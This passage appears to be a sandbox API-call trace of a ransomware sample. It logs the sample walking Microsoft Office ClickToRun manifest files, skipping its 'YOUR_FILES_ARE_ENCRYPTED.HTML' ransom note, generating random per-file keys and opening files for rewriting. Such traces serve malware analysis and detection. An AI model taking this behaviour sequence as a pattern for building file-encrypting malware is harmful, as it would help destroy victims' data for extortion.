lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" [0156.017] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.017] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.018] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c50cd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.excelmui.msi.16.en-us.xml", cAlternateFileName="C2D2CD~1.XML")) returned 1 [0156.018] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned 116 [0156.018] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.018] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0156.018] lstrlenW (lpString=".xml") returned 4 [0156.018] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0156.018] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.018] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=35024) returned 1 [0156.018] GetProcessHeap () returned 0x270000 [0156.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x749a470 [0156.022] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="92") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2B") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="61") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CC") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="8F") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="05") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EB") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6E") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7D") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="48") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="55") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0B") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="60") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="59") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D1") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B7") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="74") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="52") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C6") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="1E") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DE") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="48") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A5") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E0") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A2") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C8") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="72") returned 2 [0156.023] lstrcpyW (in: lpString1=0x74aa524, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" [0156.023] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x749a470, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.023] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x749a470, lpOverlapped=0x749a470) returned 1 [0156.023] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x772cb4d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cAlternateFileName="C233DB~1.XML")) returned 1 [0156.023] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned 129 [0156.023] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.023] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0156.023] lstrlenW (lpString=".xml") returned 4 [0156.023] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0156.024] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x59c [0156.025] GetFileSizeEx (in: hFile=0x59c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=36614) returned 1 [0156.025] GetProcessHeap () returned 0x270000 [0156.025] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c25c8 [0156.080] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C1") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="0C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6D") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B4") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="96") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="DF") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DB") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="D4") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="07") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="91") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="1F") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="16") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="68") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="52") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="16") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="39") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E6") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="0E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="93") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="76") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="7C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B0") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="64") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="26") returned 2 [0156.082] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="28") returned 2 [0156.082] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7C") returned 2 [0156.082] lstrcpyW (in: lpString1=0x74d267c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" [0156.082] CreateIoCompletionPort (FileHandle=0x59c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c25c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.082] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c25c8, lpOverlapped=0x74c25c8) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c9cf90, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.groovemui.msi.16.en-us.xml", cAlternateFileName="C26024~1.XML")) returned 1 [0156.083] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned 117 [0156.083] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.083] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0156.084] lstrlenW (lpString=".xml") returned 4 [0156.084] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0156.085] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.085] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.085] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6134) returned 1 [0156.085] GetProcessHeap () returned 0x270000 [0156.085] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.099] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="63") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="ED") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B9") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="02") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="55") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0D") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3E") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="17") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="FF") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CC") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8D") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="38") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E6") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="D7") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="88") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8D") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B7") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A5") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="ED") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A6") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A2") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0D") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CF") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7A") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6B") returned 2 [0156.101] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" [0156.101] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.101] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.101] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7733d8f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x15dd6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cAlternateFileName="C25956~1.XML")) returned 1 [0156.101] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned 125 [0156.101] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.103] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0156.103] lstrlenW (lpString=".xml") returned 4 [0156.103] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0156.103] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.103] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.127] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89558) returned 1 [0156.127] GetProcessHeap () returned 0x270000 [0156.127] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.128] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="92") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="88") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="55") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="FA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C8") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="63") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A5") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A2") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="74") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AD") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="56") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="47") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="CF") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0D") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BE") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A6") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="04") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="82") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="57") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C8") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5E") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="77") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="99") returned 2 [0156.129] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" [0156.129] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.129] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.129] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77d0f3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml", cAlternateFileName="C2FCD6~1.XML")) returned 1 [0156.130] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned 115 [0156.130] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.130] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0156.130] lstrlenW (lpString=".xml") returned 4 [0156.131] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0156.131] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.131] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.143] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=23328) returned 1 [0156.143] GetProcessHeap () returned 0x270000 [0156.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.144] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" [0156.144] 